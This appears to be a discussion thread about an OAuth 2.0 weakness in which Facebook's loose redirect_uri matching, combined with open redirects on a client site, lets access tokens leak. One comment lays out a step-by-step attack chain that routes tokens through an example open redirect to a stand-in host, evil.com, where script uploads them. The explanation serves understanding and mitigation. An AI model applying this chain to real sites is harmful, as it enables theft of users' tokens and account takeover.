Oddly, Facebook has chosen not to follow this recommendation. So any websites that integrate Facebook OAuth must ensure that they contain no open-redirects or they can be hacked in this way. This is worrisome because open-redirects would not otherwise be considered much of a security problem.
Hopefully not too oddly: Facebook was one of the first OAuth 2.0 implementations and the additional benefits of requiring stricter pre-registration was not initially apparent. An unfortunate oversight. For kicks: compare section 5.2.3.5 v00 with v01
Changing the implementation at this point is a daunting task (for both Facebook and our developers) but we do hope to offer it as part of a future migration.
* Why is there an access_token in a browser url ? (query string or fragment)
The access_token is provided by the Authorization Server to the client,
and not to the user.
The user should only received an authorization_code. And, to get an
access_token, the client must have an authorization_code and know
the "client_secret".
access_token should never been seen on a browser, right ?
Does Facebook really respect the protocol? in other word,
is it a facebook problem or an OAuth problem ?
To me it seem hyperbolic to call it the "Achilles heel of OAuth [2.0]." Other oauth providers than Facebook are smart enough to make the redirect_uri constant. Then the attack surface is reduced from the whole of mydomain.com to mydomain.com/whatever-redirect_uri-is. For those, the attack needs to be sophisticated enough to interfere with that specific url. But if the client site is owned that hard, it's lost anyway.
I'm not sure if I understand this problem or security hole here. When I write some OAuth application I need to register my redirect_url. So how somebody can steal access token / code?
1. You register foo.com as your redirect with FB. Your oauth endpoint is actually foo.com/fbauth, but Facebook is OK with just the domain.
2. Somewhere else on your site, you allow open redirects, like maybe a user can create a link that you proxy with a redirect for click-tracking purposes, like foo.com/links?url=evil.com
3. An attacker makes an oauth query to Facebook with the redirect URL hacked so that it points at foo.com/links?url=evil.com
4. FB dutifully sends your user to the hacked URL, which redirects to evil.com with all of its hashy stuff in place.
5. Javascript on evil.com reads the hash and uploads it
It's not clear--and I'm too lazy to test--whether FB will restrict the forward to foo.com/fbauth if you're explicit about it when configuring your app. But certainly the wording on the developer console just asks for your site URL, and even though I'm pretty familiar with oauth, I have never bothered to do more than that. Google, on the other hand, forces you to.
Thanks for explanation.
May I ask how the attacker can make "an oauth query to Facebook with the redirect URL hacked so that it points at foo.com/links?url=evil.com"? Are you saying that attacker somehow convinces user to visit maliciously created Facebook authentication URL?
Right, I worded that poorly. You need some other vulnerability for the attacker to pull this trick off. But, like homokov says, there are a lot of possibilities for that. Obviously, such a vulnerability is bad on its own and the site owner should prevent it, but FB should be better about mitigating it from their end.
Sorry if I misunderstand, but would that mean that (along with what you wrote about whitelist/static) a "replace hash values", for instance, would mitigate the attack?
I currently have a OAuth (1.0a) implementation down the road (and would be very willing to hiring you when we begin).
Am I understanding this correctly that a "good" practice would be to redirect the user always to e.g. a static "you've granted app X permissions", or other dummy page (within our domains control) which the user will simply close, or oob?
Not asking you to dish out your expertise, just a quick question :)
And thanks for the nice articles, you're doing a lot of good.
I believe they're both in the query string, but you're right - code is what's sent by way of the client. access_token is exchanged between the servers.
what provider? Facebook never sends it in query string. It can also be available for Man In The Middle, in server side logs etc. Hash is supposed to be more secure.
For those who are totally confused as to why an access token is being shared with an end user and why it's transmitted in a URL fragment, I think I figured out what's going on. Facebook appears to have a flow for logging in client-side in the browser [1]. In that flow, the access token is meant to be delivered to a JavaScript client in the browser, so a URL fragment makes some sense.
I don't know if any of this is covered by the OAuth spec. (I'm only familiar with the so-called "three-legged" OAuth protocol.)
I don't quite get the "let me explain again response_type=code flow". Doesn't seem relevant to the article since the code flow isn't leaking any access token to the client side at all. Though the solution of making the redirect_uri explicit seems pretty good for the original problem.
Oddly, Facebook has chosen not to follow this recommendation. So any websites that integrate Facebook OAuth must ensure that they contain no open-redirects or they can be hacked in this way. This is worrisome because open-redirects would not otherwise be considered much of a security problem.